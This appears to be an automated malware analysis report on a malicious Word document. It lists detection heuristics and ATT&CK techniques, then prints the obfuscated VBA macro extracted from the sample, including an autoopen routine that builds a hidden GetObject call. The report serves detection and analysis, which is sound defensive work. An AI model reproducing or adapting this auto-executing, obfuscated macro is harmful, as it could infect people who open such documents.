Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. Heuristics indicate the use of GetObject, suggesting an attempt to execute code or load external resources. A VBA macro with auto-execution capabilities strongly implies downloader or dropper functionality, that is, code that fetches and runs a secondary payload.
Heuristics (7)
- ClamAV: Doc.Malware.00536d-6935045-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6935045-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 51bf0fd8e89a57ddabd31c014d8f5f9051b20a11cf22535e823f24dbb4f76883) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6952 bytes |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "OCAoDoQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dDBAAAAB"
Attribute VB_Base = "0{EBFDFC19-B7BF-418A-97FE-AB632A05B910}{7795F890-6BF8-4739-AAEE-3776333732ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "YcAACGXo"
Attribute VB_Base = "0{49255DC2-CEAC-4F8F-BF71-AF58B31CE62B}{3FCA97B8-0E60-4194-ACE6-379473253605}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "CZU_BA41"
Function MAcwxQD()
If rBUAUAA > vAGUGAAA Then
HDDQ1AAB = 199577434 - AAAUZQU
If oAZDXAA < sU1UZDA Then
Day Atn(Bo4QAwo)
End If
End If
Set zXXoA4 = tcDBZo
If HQGkUA > YAAkAx Then
fAACAAB = 574569904 - mcQUAQ
If EUGAAAA < HwAUGCQA Then
Day Atn(rDwk__AU)
End If
End If
Set PoQACAoG = vUAADAZA
End Function
Sub autoopen()
uADADGQB
End Sub
Function S11DAx()
If WAXAAAAw > KBxcUAAA Then
pcAXAAA = 239042529 - NAAQUXUX
If dkCAAwXU < bUXCc_ Then
Day Atn(VQXAxAA)
End If
End If
Set dQAAUQ = BwDxAAkA
If K_1GBAD > zUwUxC Then
lAACQAA = 382264621 - C4AGZkX
If cUQcBDA1 < EZAAD_4U Then
Day Atn(N1UAAG11)
End If
End If
Set aDxDkX = dAACUD
End Function
Attribute VB_Name = "sACUAZ"
Function TAADDXCB()
If kZAXAwA_ > PGk4GG Then
kAAAAZU = 758398612 - tAB4AXQ
If N4GADGxQ < sGA14A Then
Day Atn(fkZAAoB)
End If
End If
Set kACDUAB = hDGoCB
If DXA_QA > rXADA4A Then
ABZDUB = 812821125 - wAxBQAQ1
If oUB_A1A < PcXABAB Then
Day Atn(jACZBZ)
End If
End If
Set OAA1AUU = WUUQAQ_
If VBAkAGA > p_kBDA Then
LAk1oDU4 = 356228888 - wUACUDwc
If iBX_ADU < iAXGAADA Then
Day Atn(ZADA_4cQ)
End If
End If
Set HX4ABAC = O1QAAB
End Function
Function uADADGQB()
On Error Resume Next
If WoAAAAAc > QUwDACD Then
FoBAQUG = 659060732 - KAABQ4B
If sQAAcA < K_owQQ Then
Day Atn(swZDBc)
End If
End If
Set X_DB_ZG = wAXc4A
If MkDA1cBQ > kkXcAoA Then
ACwAAxXA = 735108109 - XADUB1
If CBDAwCX < D1AACXD Then
Day Atn(w1DBkA)
End If
End If
Set OAAAAQ1_ = kxocQAD
hBk1_XAC = YcAACGXo.McxAwB + YcAACGXo.qXxAZAkA + YcAACGXo.McxAwB + YcAACGXo.fZkXD1GU + YcAACGXo.McxAwB
If fQAAkAQ > YAA1BAD Then
k_AADocD = 301118368 - cAwA1AAG
If aAAoAZBQ < pDA44AX Then
Day Atn(CCCQxQ)
End If
End If
Set wZAGAcX = cAUk1_c
If JABAAwA > lGDAAA Then
iXDAAAcc = 697559481 - NUABAX
If nD4UZxBA < AAAxUCA Then
Day Atn(NBABcxB)
End If
End If
Set qAAAAU = YoxwwBDU
Set VAAAQCG = GetObject(YcAACGXo.McxAwB + YcAACGXo.qXxAZAkA + YcAACGXo.McxAwB + YcAACGXo.fZkXD1GU + YcAACGXo.McxAwB + YcAACGXo.AAAx_GB + YcAACGXo.McxAwB)
If sAZA4AA > AUX1xGA Then
a4wwXAUB = 819632414 - tU1BkAUA
If SQBGAQ_w < bZ4AAU Then
Day Atn(BQcDcQ)
End If
End If
Set jAXc1AX = TBAQA4AZ
If zcZB_AA > LACoB1 Then
OAxAQQAQ = 350164482 - wcBAxwAA
If iZABAxQA < zADQZA Then
Day Atn(XAkAXQ)
End If
End If
Set GAGAGAA = jQAA1ABA
If sxBwAUc > JwAxQUA1 Then
GQ_BcZBU = 363408916 - PAQQ_AQU
If L_GA_AAB < cDXUxUA Then
Day Atn(QAXkoUAA)
End If
End If
Set OoBXAA = bQkAGAAA
If 352177 = 352177 Then
If ZBZADAAA > uQD_GQDZ Then
EGAAcQQ = 28786758
... (truncated)